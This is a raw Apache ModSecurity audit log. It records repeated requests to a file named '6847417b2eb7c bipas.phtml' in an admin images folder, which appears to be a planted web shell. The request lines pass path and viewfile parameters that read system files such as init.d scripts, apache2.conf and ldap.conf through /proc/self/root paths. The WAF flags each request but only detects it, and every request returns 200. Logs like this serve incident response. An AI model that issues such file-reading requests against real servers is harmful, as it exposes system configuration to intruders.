ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --2722c33e-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 4184 Connection: close Content-Type: text/html; charset=UTF-8 --2722c33e-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/self/root/etc/init.d/apport"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCKApVkCcfT-Z8NQYyu8gAAAAc"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/self/root/etc/init.d/apport"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCKApVkCcfT-Z8NQYyu8gAAAAc"] Apache-Handler: application/x-httpd-php Stopwatch: 1750108674345403 4458 (- - -) Stopwatch2: 1750108674345403 4458; combined=2444, p1=344, p2=1931, p3=41, p4=33, p5=94, sr=90, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --2722c33e-Z-- --78561f67-A-- [17/Jun/2025:02:48:38.230300 +0530] aFCKLooVQnPDyHnl9oO9ygAAAAY 216.73.216.71 45294 127.0.0.1 7081 --78561f67-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fetc%2Fapache2&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fetc%2Fapache2%2Fapache2.conf HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --78561f67-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 6091 Connection: close Content-Type: text/html; charset=UTF-8 --78561f67-H-- Message: Warning. Matched phrase "etc/apache2/apache2.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/apache2/apache2.conf found within ARGS:viewfile: /proc/thread-self/root/etc/apache2/apache2.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/apache2/apache2.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/apache2/apache2.conf found within ARGS:viewfile: /proc/thread-self/root/etc/apache2/apache2.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCKLooVQnPDyHnl9oO9ygAAAAY"] Apache-Handler: application/x-httpd-php Stopwatch: 1750108718226086 4271 (- - -) Stopwatch2: 1750108718226086 4271; combined=2038, p1=339, p2=1571, p3=34, p4=40, p5=53, sr=94, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --78561f67-Z-- --d73f7d75-A-- [17/Jun/2025:02:48:38.686540 +0530] aFCKLqC450Yw050Ymr0QZgAAAAk 216.73.216.71 45366 127.0.0.1 7081 --d73f7d75-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fsnap%2Fcore20%2F2582%2Fetc%2Finit.d&viewfile=%2F%2Fsnap%2Fcore20%2F2582%2Fetc%2Finit.d%2Fdbus HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --d73f7d75-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 4444 Connection: close Content-Type: text/html; charset=UTF-8 --d73f7d75-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /snap/core20/2582/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /snap/core20/2582/etc/init.d/dbus"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /snap/core20/2582/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCKLqC450Yw050Ymr0QZgAAAAk"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /snap/core20/2582/etc/init.d/dbus"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCKLqC450Yw050Ymr0QZgAAAAk"] Apache-Handler: application/x-httpd-php Stopwatch: 1750108718682161 4443 (- - -) Stopwatch2: 1750108718682161 4443; combined=2219, p1=379, p2=1687, p3=37, p4=30, p5=86, sr=108, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d73f7d75-Z-- --a2651b1d-A-- [17/Jun/2025:02:48:47.423199 +0530] aFCKN6C450Yw050Ymr0QdQAAAAk 216.73.216.71 43646 127.0.0.1 7081 --a2651b1d-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fself%2Froot%2Fetc%2Finit.d&viewfile=%2F%2Fproc%2Fself%2Froot%2Fetc%2Finit.d%2Fudev HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --a2651b1d-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 5328 Connection: close Content-Type: text/html; charset=UTF-8 --a2651b1d-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/self/root/etc/init.d/udev"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCKN6C450Yw050Ymr0QdQAAAAk"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/self/root/etc/init.d/udev"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCKN6C450Yw050Ymr0QdQAAAAk"] Apache-Handler: application/x-httpd-php Stopwatch: 1750108727418633 4620 (- - -) Stopwatch2: 1750108727418633 4620; combined=2484, p1=391, p2=1932, p3=42, p4=34, p5=85, sr=141, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a2651b1d-Z-- --21850471-A-- [17/Jun/2025:02:48:47.787524 +0530] aFCKN6EB9lmWsOo-rPOOpAAAAAU 216.73.216.71 43694 127.0.0.1 7081 --21850471-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fself%2Froot%2Fetc%2Finit.d&viewfile=%2F%2Fproc%2Fself%2Froot%2Fetc%2Finit.d%2Fscreen-cleanup HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --21850471-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3567 Connection: close Content-Type: text/html; charset=UTF-8 --21850471-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/self/root/etc/init.d/screen-cleanup"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCKN6EB9lmWsOo-rPOOpAAAAAU"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/self/root/etc/init.d/screen-cleanup"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCKN6EB9lmWsOo-rPOOpAAAAAU"] Apache-Handler: application/x-httpd-php Stopwatch: 1750108727783236 4342 (- - -) Stopwatch2: 1750108727783236 4342; combined=2324, p1=356, p2=1798, p3=40, p4=32, p5=98, sr=97, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --21850471-Z-- --b31aa547-A-- [17/Jun/2025:02:49:27.353813 +0530] aFCKX6RT9PYLci8mxb0YNwAAAAM 216.73.216.71 49244 127.0.0.1 7081 --b31aa547-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fself%2Froot%2Fetc%2Finit.d&viewfile=%2F%2Fproc%2Fself%2Froot%2Fetc%2Finit.d%2Fufw HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --b31aa547-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3636 Connection: close Content-Type: text/html; charset=UTF-8 --b31aa547-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/self/root/etc/init.d/ufw"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCKX6RT9PYLci8mxb0YNwAAAAM"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/self/root/etc/init.d/ufw"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCKX6RT9PYLci8mxb0YNwAAAAM"] Apache-Handler: application/x-httpd-php Stopwatch: 1750108767349084 4785 (- - -) Stopwatch2: 1750108767349084 4785; combined=2727, p1=388, p2=2164, p3=48, p4=38, p5=89, sr=115, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b31aa547-Z-- --706fe57a-A-- [17/Jun/2025:02:49:28.440074 +0530] aFCKYKC450Yw050Ymr0QiQAAAAk 216.73.216.71 49388 127.0.0.1 7081 --706fe57a-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fself%2Froot%2Fetc%2Finit.d&viewfile=%2F%2Fproc%2Fself%2Froot%2Fetc%2Finit.d%2Firqbalance HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --706fe57a-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 4068 Connection: close Content-Type: text/html; charset=UTF-8 --706fe57a-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/self/root/etc/init.d/irqbalance"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCKYKC450Yw050Ymr0QiQAAAAk"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/self/root/etc/init.d/irqbalance"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCKYKC450Yw050Ymr0QiQAAAAk"] Apache-Handler: application/x-httpd-php Stopwatch: 1750108768436084 4054 (- - -) Stopwatch2: 1750108768436084 4054; combined=2159, p1=396, p2=1609, p3=37, p4=30, p5=86, sr=140, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --706fe57a-Z-- --84499360-A-- [17/Jun/2025:02:49:36.182355 +0530] aFCKaKRT9PYLci8mxb0YRAAAAAM 216.73.216.71 35528 127.0.0.1 7081 --84499360-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fsnap%2Fcore20%2F2582%2Fetc%2Finit.d&viewfile=%2F%2Fsnap%2Fcore20%2F2582%2Fetc%2Finit.d%2Fkmod HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --84499360-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3876 Connection: close Content-Type: text/html; charset=UTF-8 --84499360-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /snap/core20/2582/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /snap/core20/2582/etc/init.d/kmod"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /snap/core20/2582/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCKaKRT9PYLci8mxb0YRAAAAAM"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /snap/core20/2582/etc/init.d/kmod"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCKaKRT9PYLci8mxb0YRAAAAAM"] Apache-Handler: application/x-httpd-php Stopwatch: 1750108776177505 4906 (- - -) Stopwatch2: 1750108776177505 4906; combined=2645, p1=360, p2=2117, p3=40, p4=33, p5=94, sr=98, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --84499360-Z-- --bff48e20-A-- [17/Jun/2025:02:49:37.913011 +0530] aFCKaRwcFb_n1P0IC9x_7QAAAAo 216.73.216.71 35788 127.0.0.1 7081 --bff48e20-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fself%2Froot%2Fetc%2Finit.d&viewfile=%2F%2Fproc%2Fself%2Froot%2Fetc%2Finit.d%2Fdbus HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --bff48e20-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 4437 Connection: close Content-Type: text/html; charset=UTF-8 --bff48e20-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/self/root/etc/init.d/dbus"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCKaRwcFb_n1P0IC9x_7QAAAAo"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/self/root/etc/init.d/dbus"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCKaRwcFb_n1P0IC9x_7QAAAAo"] Apache-Handler: application/x-httpd-php Stopwatch: 1750108777909353 3750 (- - -) Stopwatch2: 1750108777909353 3750; combined=1770, p1=256, p2=1345, p3=54, p4=33, p5=81, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --bff48e20-Z-- --9406e40c-A-- [17/Jun/2025:02:50:21.795230 +0530] aFCKlaC450Yw050Ymr0QtwAAAAk 216.73.216.71 44232 127.0.0.1 7081 --9406e40c-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fetc%2Fldap&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fetc%2Fldap%2Fldap.conf HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --9406e40c-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3205 Connection: close Content-Type: text/html; charset=UTF-8 --9406e40c-H-- Message: Warning. Matched phrase "etc/ldap/ldap.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/ldap/ldap.conf found within ARGS:viewfile: /proc/thread-self/root/etc/ldap/ldap.conf"] [severity "CRITICAL"] [tag "CWAF"] 